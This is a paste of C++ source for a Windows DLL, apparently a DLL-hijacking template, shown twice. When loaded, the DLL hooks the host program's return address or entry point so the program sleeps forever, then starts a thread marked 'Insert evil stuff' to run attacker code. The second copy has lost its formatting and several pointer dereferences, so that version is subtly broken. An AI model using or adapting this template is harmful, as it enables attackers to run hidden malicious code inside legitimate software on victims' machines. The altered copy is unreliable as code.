coldfusion39 · February 20, 2020 15:23
diff --git a/main.cpp b/main.cpp
 #include <Windows.h>
 #include <intrin.h>
 #include <string>
 #include <TlHelp32.h>
 #include <psapi.h>

 DWORD WINAPI Thread(LPVOID lpParam) {
 	// Insert evil stuff

 	ExitProcess(0);
 	return 1;
 }

 void DoNothing() {
 	while (true) Sleep(10 * 1000);
 }

 void InstallHook(PVOID address, PVOID jump) {
 	BYTE Jump[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };
 	
 	DWORD old;
 	VirtualProtect(address, sizeof(Jump), 0x40, &old);

 	RtlCopyMemory(address, Jump, 12);
 	RtlCopyMemory(((PBYTE)address + 2), &jump, 8);

 	VirtualProtect(address, sizeof(Jump), old, &old);
 }

 BOOL HookTheStack() {

 	// Get primary module info

 	PBYTE baseAddress = NULL;
 	DWORD baseSize = 0;

 	WCHAR fileName[MAX_PATH];
 	GetProcessImageFileName((HANDLE)-1, fileName, MAX_PATH);
 	std::wstring pathString = std::wstring(fileName);

 	HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());

 	MODULEENTRY32 pEntry;
 	pEntry.dwSize = sizeof(pEntry);
 	BOOL hRes = Module32Next(hSnapShot, &pEntry);
 	while (hRes)
 	{
 		if (pathString.find(pEntry.szModule) != std::wstring::npos) {
 			baseAddress = pEntry.modBaseAddr;
 			baseSize = pEntry.modBaseSize;
 			break;
 		}
 		hRes = Module32Next(hSnapShot, &pEntry);
 	}
 	CloseHandle(hSnapShot);

 	if (!baseAddress || !baseSize)
 		return FALSE;

 	// Hunt the stack

 	PBYTE ldrLoadDll = (PBYTE)GetProcAddress(GetModuleHandle(L"ntdll"), "LdrLoadDll");
 	PBYTE * stack = (PBYTE *)_AddressOfReturnAddress();
 	BOOL foundLoadDll = FALSE;

 	ULONG_PTR lowLimit, highLimit;
 	GetCurrentThreadStackLimits(&lowLimit, &highLimit);

 	for (; (ULONG_PTR)stack < highLimit; stack++) {
 		if (*stack < (PBYTE)0x1000)
 			continue;

 		if (*stack > ldrLoadDll && *stack < ldrLoadDll + 0x1000) {
 			// LdrLoadDll is in the stack, let's start looking for our module
 			foundLoadDll = TRUE;
 		}

 		if (foundLoadDll && *stack > baseAddress && *stack < (baseAddress + baseSize)) {
 			MEMORY_BASIC_INFORMATION mInfo = { 0 };
 			VirtualQuery(*stack, &mInfo, sizeof(mInfo));

 			if (!(mInfo.Protect & PAGE_EXECUTE_READ))
 				continue;

 			// Primary module is in the stack, let's hook there
 			InstallHook(*stack, DoNothing);

 			return TRUE;
 		}
 	}

 	// No references found, let's just hook the entry point

 	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
 	PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew);
 	PBYTE entryPoint = baseAddress + ntHeader->OptionalHeader.AddressOfEntryPoint;

 	InstallHook(entryPoint, &DoNothing);
 	
 	return TRUE;
 }

 BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
 {

 	if (ul_reason_for_call != DLL_PROCESS_ATTACH)
 		return TRUE;

 	if (!HookTheStack())
 		return TRUE;

 	DWORD dwThread;
 	HANDLE hThread = CreateThread(NULL, 0, Thread, NULL, 0, &dwThread);

 	return TRUE;
 }
	#include <Windows.h>
	#include <intrin.h>
	#include <string>
	#include <TlHelp32.h>
	#include <psapi.h>

	DWORD WINAPI Thread(LPVOID lpParam) {
	// Insert evil stuff

	ExitProcess(0);
	return 1;
	}

	void DoNothing() {
	while (true) Sleep(10 * 1000);
	}

	void InstallHook(PVOID address, PVOID jump) {
	BYTE Jump[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };

	DWORD old;
	VirtualProtect(address, sizeof(Jump), 0x40, &old);

	RtlCopyMemory(address, Jump, 12);
	RtlCopyMemory(((PBYTE)address + 2), &jump, 8);

	VirtualProtect(address, sizeof(Jump), old, &old);
	}

	BOOL HookTheStack() {

	// Get primary module info

	PBYTE baseAddress = NULL;
	DWORD baseSize = 0;

	WCHAR fileName[MAX_PATH];
	GetProcessImageFileName((HANDLE)-1, fileName, MAX_PATH);
	std::wstring pathString = std::wstring(fileName);

	HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());

	MODULEENTRY32 pEntry;
	pEntry.dwSize = sizeof(pEntry);
	BOOL hRes = Module32Next(hSnapShot, &pEntry);
	while (hRes)
	{
	if (pathString.find(pEntry.szModule) != std::wstring::npos) {
	baseAddress = pEntry.modBaseAddr;
	baseSize = pEntry.modBaseSize;
	break;
	}
	hRes = Module32Next(hSnapShot, &pEntry);
	}
	CloseHandle(hSnapShot);

	if (!baseAddress \|\| !baseSize)
	return FALSE;

	// Hunt the stack

	PBYTE ldrLoadDll = (PBYTE)GetProcAddress(GetModuleHandle(L"ntdll"), "LdrLoadDll");
	PBYTE * stack = (PBYTE *)_AddressOfReturnAddress();
	BOOL foundLoadDll = FALSE;

	ULONG_PTR lowLimit, highLimit;
	GetCurrentThreadStackLimits(&lowLimit, &highLimit);

	for (; (ULONG_PTR)stack < highLimit; stack++) {
	if (*stack < (PBYTE)0x1000)
	continue;

	if (stack > ldrLoadDll && stack < ldrLoadDll + 0x1000) {
	// LdrLoadDll is in the stack, let's start looking for our module
	foundLoadDll = TRUE;
	}

	if (foundLoadDll && stack > baseAddress && stack < (baseAddress + baseSize)) {
	MEMORY_BASIC_INFORMATION mInfo = { 0 };
	VirtualQuery(*stack, &mInfo, sizeof(mInfo));

	if (!(mInfo.Protect & PAGE_EXECUTE_READ))
	continue;

	// Primary module is in the stack, let's hook there
	InstallHook(*stack, DoNothing);

	return TRUE;
	}
	}

	// No references found, let's just hook the entry point

	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
	PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew);
	PBYTE entryPoint = baseAddress + ntHeader->OptionalHeader.AddressOfEntryPoint;

	InstallHook(entryPoint, &DoNothing);

	return TRUE;
	}

	BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
	{

	if (ul_reason_for_call != DLL_PROCESS_ATTACH)
	return TRUE;

	if (!HookTheStack())
	return TRUE;

	DWORD dwThread;
	HANDLE hThread = CreateThread(NULL, 0, Thread, NULL, 0, &dwThread);

	return TRUE;
	}